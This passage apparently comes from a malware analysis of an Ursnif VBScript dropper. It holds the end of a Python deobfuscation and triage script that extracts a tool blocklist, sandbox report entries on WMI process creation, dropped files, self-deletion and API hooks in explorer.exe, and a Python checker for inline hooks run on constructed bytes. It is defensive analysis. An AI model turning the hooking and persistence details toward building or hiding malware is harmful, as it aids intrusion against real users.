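    cleaned = fold_numeric_assignments(strip_filler_comments(src))
    return {"cleaned": cleaned,
            "sleep_ms": sleep_window_ms(cleaned),
            "blocklist": process_blocklist(cleaned)}


if __name__ == "__main__":
    result = triage(SAMPLE_VBS)
    print(result["cleaned"])
    print("sleep window (ms):", result["sleep_ms"])
    print("blocklisted tools:", result["blocklist"])
```

Constant folding goes through Python's ast rather than eval() so that only arithmetic is ever executed; anything else in the right-hand side raises instead of running. The comment stripper only removes whole-line comments, because a ' inside a VBScript string literal is not a comment.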

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\fum.cpp (dropped file)
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dll (dropped file)
                      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\fum.cpp (dropped file)

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara match | File sources: the same 21 memory dumps and unpacked PE regions listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above
                      Hooks registry keys query functions (used to hide registry keys)
                      Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the prolog of user mode functions (user mode inline hooks)
                      Source: explorer.exe | User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
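The inline-hook entry above reports that the first bytes of KERNEL32!CreateProcessAsUserW in explorer.exe no longer match the module's code. The usual way to confirm such a hook by hand is to compare the live prolog with the same bytes from the on-disk image and decode the trampoline. The following is an added example, not part of the sandbox report: it performs that comparison on constructed byte strings (a typical x64 API prolog and two common hook encodings; the six bytes the report shows for this sample are deliberately not used), with hypothetical virtual addresses standing in for values that would come from the target's export table.

```python
import struct

MASK64 = (1 << 64) - 1

# Constructed prolog bytes (not bytes from this sample): a typical x64 Win32
# API entry sequence, then the same 10 bytes after two common hook encodings.
CLEAN_PROLOG = bytes.fromhex("48895c2408 4889742410")   # mov [rsp+8],rbx ; mov [rsp+10h],rsi
HOOK_JMP_REL32 = b"\xe9" + struct.pack("<i", 0x1000) + CLEAN_PROLOG[5:]               # jmp +0x1000
HOOK_PUSH_RET = b"\x68" + struct.pack("<I", 0x00450000) + b"\xc3" + CLEAN_PROLOG[6:]  # push imm32 ; ret


def classify_prolog(disk: bytes, live: bytes, func_va: int) -> dict:
    """Compare the first bytes of a function as mapped from the on-disk image
    (after relocations are applied) with the live in-process copy. Returns
    {'hooked': False} when they agree; otherwise the trampoline encoding and,
    where it can be decoded statically, where control is diverted to."""
    n = min(len(disk), len(live))
    if disk[:n] == live[:n]:
        return {"hooked": False}
    if n >= 5 and live[0] == 0xE9:                        # jmp rel32
        rel = struct.unpack_from("<i", live, 1)[0]
        return {"hooked": True, "kind": "jmp rel32",
                "target": (func_va + 5 + rel) & MASK64}
    if n >= 6 and live[0] == 0x68 and live[5] == 0xC3:    # push imm32 ; ret
        return {"hooked": True, "kind": "push imm32; ret",
                "target": struct.unpack_from("<I", live, 1)[0]}
    if n >= 6 and live[:2] == b"\xff\x25":                # jmp [rip+disp32] on x64
        disp = struct.unpack_from("<i", live, 2)[0]
        return {"hooked": True, "kind": "jmp [mem]",
                "pointer_slot": (func_va + 6 + disp) & MASK64}
    return {"hooked": True, "kind": "unrecognised", "live_bytes": live[:8].hex()}


def scan_exports(samples: dict) -> dict:
    """samples: {name: (disk_bytes, live_bytes, va)} -> {name: verdict} for hooked ones."""
    verdicts = {}
    for name, (disk, live, va) in samples.items():
        verdict = classify_prolog(disk, live, va)
        if verdict["hooked"]:
            verdicts[name] = verdict
    return verdicts


# Hypothetical virtual addresses; names only echo the report's hook entries.
SAMPLES = {
    "CreateProcessAsUserW": (CLEAN_PROLOG, HOOK_JMP_REL32, 0x7FFB70FF0000),
    "RegGetValueW":         (CLEAN_PROLOG, HOOK_PUSH_RET, 0x7FFB71000000),
    "GetTickCount":         (CLEAN_PROLOG, CLEAN_PROLOG, 0x7FFB71010000),
}

if __name__ == "__main__":
    for name, verdict in scan_exports(SAMPLES).items():
        print(name, verdict)
```

The "unrecognised" branch matters in practice: hooks that overwrite the prolog with anything other than a plain jmp or push/ret (as the six bytes reported here do) still show up as a mismatch, and the raw bytes are returned for manual disassembly rather than silently ignored.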
                      Deletes itself after installation
                      Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\start[526268].vbs
                      Modifies the export address table of user mode modules (user mode EAT hooks)
                      Source: explorer.exe | IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
                      Modifies the import address table of user mode modules (user mode IAT hooks)